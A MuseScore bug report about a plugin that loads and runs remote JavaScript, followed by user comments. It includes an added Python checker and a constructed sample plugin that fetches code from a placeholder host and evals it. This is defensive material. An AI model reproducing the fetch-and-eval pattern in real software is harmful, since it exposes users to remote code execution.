Dangerous remote code loading

Aug 28, 2019 - 15:50
Reported version: 3.2
Priority: P0 - Critical
Type: Functional
Frequency: Once
Severity: S2 - Critical
Reproducibility: Always
Status: active
Regression: No
Workaround: No

Look at the plugin code: this plugin does nothing more than load QML/JavaScript code from a remote site and then call an entry function in this code. While the code currently downloaded seems harmless, this remote code execution opens up a local MuseScore instance to all sorts of exploits (and why would you need to download code from a remote site instead of deploying it with the plugin file?).
The overall look of the musicalion website makes that whole procedure even more dubious - no impressum, no contact, no DSGVO-required information.
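As an added illustration (not part of this report or of the plugin in question), a static pre-install check that flags the pattern described above, a QML plugin that fetches code over the network and evaluates it, so the reviewer sees it before running the plugin. The two sample plugins, the host plugin-host.invalid and the entry function name are constructed; the Qt API names matched are real.

```python
import re

# Constructed sample, not the plugin from the report: a MuseScore QML
# plugin that fetches JavaScript at run time and evaluates it.
SUSPICIOUS_PLUGIN = """\
import MuseScore 3.0
MuseScore {
    onRun: {
        var xhr = new XMLHttpRequest()
        xhr.open("GET", "https://plugin-host.invalid/entry.js?date=" + Qt.formatDate(new Date(), "yyyy-MM-dd"), false)
        xhr.send()
        eval(xhr.responseText)   // whatever the server returned today
        remoteEntry(curScore)
    }
}
"""
# Constructed sample of a plugin that ships its code locally.
BENIGN_PLUGIN = """\
import MuseScore 3.0
import "helpers.js" as Helpers
MuseScore {
    onRun: { Helpers.transpose(curScore) }
}
"""

# QML/JS calls that turn data into code at run time (real Qt/JS API names).
DYNAMIC_EVAL = re.compile(r"\b(eval|Function|Qt\.createQmlObject)\s*\(")
# Calls that load a source file by URL; flagged when the URL is not a local literal.
URL_LOADER = re.compile(r"\bQt\.(include|createComponent)\s*\(\s*(?P<arg>[^)]*)\)")
NETWORK = re.compile(r"\bXMLHttpRequest\b")
REMOTE = re.compile(r"""^["']?https?://""")

def review_plugin(qml: str) -> dict:
    """Static pre-install check: returns per-line findings and an overall verdict."""
    findings, evaluates, fetches = [], False, False
    for no, line in enumerate(qml.splitlines(), 1):
        if DYNAMIC_EVAL.search(line):
            evaluates = True
            findings.append((no, "evaluates data as code"))
        if NETWORK.search(line):
            fetches = True
            findings.append((no, "performs a network request"))
        m = URL_LOADER.search(line)
        if m:
            arg = m.group("arg").strip()
            if REMOTE.match(arg) or not arg.startswith(('"', "'")):
                findings.append((no, "loads code from a non-local or computed URL"))
    # Fetching plus evaluating, or including by remote URL, is the pattern in the report.
    remote_code = (fetches and evaluates) or any("non-local" in msg for _, msg in findings)
    return {"verdict": "remote-code-loading" if remote_code else "ok", "findings": findings}
```

The check is a review aid, not a sandbox: code that hides the fetch behind a helper it also downloads will not be caught by a string match.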


Comments

A plugin only works if you manually add the plugin to begin with, right?
And when you do so, the plugin comes from the Internet?
So any plugin that runs "runs code from the Internet"...
OK, if the plugin doesn't live-download code, it is code that you can review before using it.
But which "normal" user does that?
So aren't all plugins "dangerous code from the Internet"?

You can inspect the plugin code prior to installing and running it; you can't with this one. Even if you can now, via that URL above, the code sent from there might change any minute (and it already might, depending on the current date, as that is passed as an argument to the server).